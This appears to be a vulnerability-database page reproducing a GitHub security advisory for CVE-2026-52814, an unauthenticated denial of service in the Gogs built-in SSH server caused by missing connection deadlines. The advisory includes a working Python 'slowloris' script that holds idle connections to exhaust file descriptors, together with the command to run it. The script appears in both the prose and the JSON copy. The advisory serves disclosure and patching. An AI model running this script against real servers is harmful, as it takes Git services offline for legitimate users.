GHSA-XP79-5MX3-JX52

Vulnerability from github – Published: 2026-06-23 17:12 – Updated: 2026-06-23 17:12
VLAI
Summary
Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)
Details

The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to golang.org/x/crypto/ssh.NewServerConn inside a new goroutine without enforcing any read/write deadlines on the underlying net.Conn.

An unauthenticated attacker can open multiple TCP connections to the SSH port and simply withhold the SSH protocol banner. This forces the server to spawn an unbounded number of goroutines that block indefinitely waiting for socket I/O. This leads to complete File Descriptor (FD) exhaustion, preventing legitimate users from accessing the Git SSH service, and ultimately destabilizing the entire Gogs process (e.g., causing internal log rotation failures).

Vulnerability Details

In internal/ssh/ssh.go, the listen function contains an accept loop that spawns a goroutine for every incoming connection:

for {
    conn, err := listener.Accept()
    // ...
    go func() {
        // VULNERABILITY: No conn.SetDeadline() is called here
        sConn, chans, reqs, err := ssh.NewServerConn(conn, config)
        // ...
    }()
}

The golang.org/x/crypto/ssh package is transport-agnostic and explicitly relies on the caller to manage connection timeouts before initiating the cryptographic handshake. Because Gogs never calls conn.SetDeadline(), the call to NewServerConn eventually reaches io.ReadFull (inside readVersion()) and blocks forever on the kernel TCP socket waiting for the client to send the SSH-2.0-... banner.

Each stuck connection consumes a file descriptor and ~10KB of memory (Goroutine stack + connection structs). An attacker holding thousands of these connections open with zero bandwidth (no data sent) will quickly exhaust the OS ulimit -n limits (accept4: too many open files), completely neutralizing the service.

Steps to Reproduce

1. Environment Setup: Ensure Gogs is configured to use the built-in Go SSH server in app.ini:

[server]
START_SSH_SERVER = true
SSH_PORT = 2222
SSH_LISTEN_PORT = 2222

2. The Exploit (PoC): Save the following Python script as slowloris-ssh.py. This script connects to the SSH port and intentionally stalls the handshake.

#!/usr/bin/env python3
import socket, sys, time

target_host = sys.argv[1]
target_port = int(sys.argv[2])
n = int(sys.argv[3])

sockets = []
print(f"[*] Starting SSH Slowloris on {target_host}:{target_port}...")

for i in range(n):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_host, target_port))
        # VULNERABILITY EXPLOIT: Do NOT send the "SSH-2.0-..." banner.
        sockets.append(s)
        if i % 100 == 0:
            print(f"[+] {i} stuck connections established")
    except Exception as e:
        print(f"[-] Stopped at {i} connections. Reason: {e}")
        break

print(f"[+] Holding {len(sockets)} connections to starve the server...")
while True:
    time.sleep(60)

3. Execution: Run the script against the target, ensuring the number of connections (n) exceeds the server's configured file descriptor limit (e.g., 1500 for default 1024 ulimit environments): python3 slowloris-ssh.py <target-ip> 2222 1500

4. Observe the Impact:

  • Attempt to connect legitimately: nc -v <target-ip> 2222. The connection will hang or be refused immediately.
  • Inspect the Gogs server logs/console. You will observe catastrophic I/O failures such as: [clog] [file]: rename rotated file ...: no such file or directory accept4: too many open files

Impact

  • Denial of Service: Legitimate developers cannot push, pull, or clone repositories via SSH.

POC:-

watch the following video for poc

Severity
5.5 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52814"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T17:12:33Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to `golang.org/x/crypto/ssh.NewServerConn` inside a new goroutine without enforcing any read/write deadlines on the underlying `net.Conn`.\n\nAn unauthenticated attacker can open multiple TCP connections to the SSH port and simply withhold the SSH protocol banner. This forces the server to spawn an unbounded number of goroutines that block indefinitely waiting for socket I/O. This leads to complete File Descriptor (FD) exhaustion, preventing legitimate users from accessing the Git SSH service, and ultimately destabilizing the entire Gogs process (e.g., causing internal log rotation failures).\n\n### Vulnerability Details\n\nIn `internal/ssh/ssh.go`, the `listen` function contains an accept loop that spawns a goroutine for every incoming connection:\n\n```go\nfor {\n    conn, err := listener.Accept()\n    // ...\n    go func() {\n        // VULNERABILITY: No conn.SetDeadline() is called here\n        sConn, chans, reqs, err := ssh.NewServerConn(conn, config)\n        // ...\n    }()\n}\n\n```\n\nThe `golang.org/x/crypto/ssh` package is transport-agnostic and explicitly relies on the caller to manage connection timeouts before initiating the cryptographic handshake. Because Gogs never calls `conn.SetDeadline()`, the call to `NewServerConn` eventually reaches `io.ReadFull` (inside `readVersion()`) and blocks forever on the kernel TCP socket waiting for the client to send the `SSH-2.0-...` banner.\n\nEach stuck connection consumes a file descriptor and ~10KB of memory (Goroutine stack + connection structs). An attacker holding thousands of these connections open with zero bandwidth (no data sent) will quickly exhaust the OS `ulimit -n` limits (`accept4: too many open files`), completely neutralizing the service.\n\n### Steps to Reproduce\n\n**1. Environment Setup:**\nEnsure Gogs is configured to use the built-in Go SSH server in `app.ini`:\n\n```ini\n[server]\nSTART_SSH_SERVER = true\nSSH_PORT = 2222\nSSH_LISTEN_PORT = 2222\n\n```\n\n**2. The Exploit (PoC):**\nSave the following Python script as `slowloris-ssh.py`. This script connects to the SSH port and intentionally stalls the handshake.\n\n```python\n#!/usr/bin/env python3\nimport socket, sys, time\n\ntarget_host = sys.argv[1]\ntarget_port = int(sys.argv[2])\nn = int(sys.argv[3])\n\nsockets = []\nprint(f\"[*] Starting SSH Slowloris on {target_host}:{target_port}...\")\n\nfor i in range(n):\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.settimeout(5)\n        s.connect((target_host, target_port))\n        # VULNERABILITY EXPLOIT: Do NOT send the \"SSH-2.0-...\" banner.\n        sockets.append(s)\n        if i % 100 == 0:\n            print(f\"[+] {i} stuck connections established\")\n    except Exception as e:\n        print(f\"[-] Stopped at {i} connections. Reason: {e}\")\n        break\n\nprint(f\"[+] Holding {len(sockets)} connections to starve the server...\")\nwhile True:\n    time.sleep(60)\n\n```\n\n**3. Execution:**\nRun the script against the target, ensuring the number of connections (`n`) exceeds the server\u0027s configured file descriptor limit (e.g., `1500` for default 1024 ulimit environments):\n`python3 slowloris-ssh.py \u003ctarget-ip\u003e 2222 1500`\n\n**4. Observe the Impact:**\n\n* Attempt to connect legitimately: `nc -v \u003ctarget-ip\u003e 2222`. The connection will hang or be refused immediately.\n* Inspect the Gogs server logs/console. You will observe catastrophic I/O failures such as:\n`[clog] [file]: rename rotated file ...: no such file or directory`\n`accept4: too many open files`\n\n### Impact\n\n* **Denial of Service:** Legitimate developers cannot push, pull, or clone repositories via SSH.\n\n### POC:-\n[watch the following video for poc](https://drive.google.com/file/d/1YGsZnxNIiwUuOrdKwJSfnRBfOEJcDHUJ/view?usp=sharing)",
  "id": "GHSA-xp79-5mx3-jx52",
  "modified": "2026-06-23T17:12:33Z",
  "published": "2026-06-23T17:12:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-xp79-5mx3-jx52"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8335"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/7da9cda314054501e1a7938a9c4d7896f331b884"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gogs has Unauthenticated Asymmetric Denial of Service (DoS) via SSH Handshake Stall (File Descriptor Exhaustion)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.